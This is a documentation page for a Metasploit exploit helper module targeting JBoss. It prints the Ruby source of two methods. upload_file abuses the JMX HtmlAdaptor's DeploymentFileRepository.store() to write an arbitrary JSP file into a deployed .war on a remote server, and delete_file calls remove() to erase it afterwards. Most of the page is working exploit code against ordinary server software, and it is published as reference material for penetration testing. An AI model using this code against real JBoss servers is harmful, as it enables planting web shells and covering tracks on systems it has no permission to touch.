Module: Msf::Exploit::Remote::HTTP::JBoss::DeploymentFileRepository

Included in:
Msf::Exploit::Remote::HTTP::JBoss
Defined in:
lib/msf/core/exploit/http/jboss/deployment_file_repository.rb

Instance Method Summary collapse

Instance Method Details

#delete_file(folder, name, ext) ⇒ Rex::Proto::Http::Response?

Delete a file with DeploymentFileRepository.remove().

Parameters:

  • folder (String)

    The destination folder name

  • name (String)

    The destination file name

  • ext (String)

    The destination file extension

Returns:


48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
# File 'lib/msf/core/exploit/http/jboss/deployment_file_repository.rb', line 48

def delete_file(folder, name, ext)
  params =  { }
  params.compare_by_identity
  params['action']     = 'invokeOpByName'
  params['name']       = 'jboss.admin:service=DeploymentFileRepository'
  params['methodName'] = 'remove'
  params['argType']    = 'java.lang.String'
  params['arg0']       = folder
  params['argType']    = 'java.lang.String'
  params['arg1']       = name
  params['argType']    = 'java.lang.String'
  params['arg2']       = ext

  opts = {
    'method'	=> http_verb,
    'uri'    => normalize_uri(target_uri.path.to_s, '/HtmlAdaptor')
  }

  if http_verb == 'POST'
    opts.merge!('vars_post' => params)
    timeout = 5
  else
    opts.merge!('vars_get' => params)
    timeout = 30
  end
  send_request_cgi(opts, timeout)
end

#upload_file(base_name, jsp_name, content) ⇒ Rex::Proto::Http::Response?

Upload a text file with DeploymentFileRepository.store()

Parameters:

  • base_name (String)

    The destination base name

  • jsp_name (String)

    The destanation file name

  • content (String)

    The content of the file

Returns:


11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# File 'lib/msf/core/exploit/http/jboss/deployment_file_repository.rb', line 11

def upload_file(base_name, jsp_name, content)
  params =  { }
  params.compare_by_identity
  params['action']     = 'invokeOpByName'
  params['name']       = 'jboss.admin:service=DeploymentFileRepository'
  params['methodName'] = 'store'
  params['argType']    = 'java.lang.String'
  params['arg0']       = base_name + '.war'
  params['argType']    = 'java.lang.String'
  params['arg1']       = jsp_name
  params['argType']    = 'java.lang.String'
  params['arg2']       = '.jsp'
  params['argType']    = 'java.lang.String'
  params['arg3']       = content
  params['argType']    = 'boolean'
  params['arg4']       = 'True'

  opts = {
    'method'	=> http_verb,
    'uri'    => normalize_uri(target_uri.path.to_s, '/HtmlAdaptor')
  }

  if http_verb == 'POST'
    opts.merge!('vars_post' => params)
  else
    opts.merge!('vars_get' => params)
  end

  send_request_cgi(opts)
end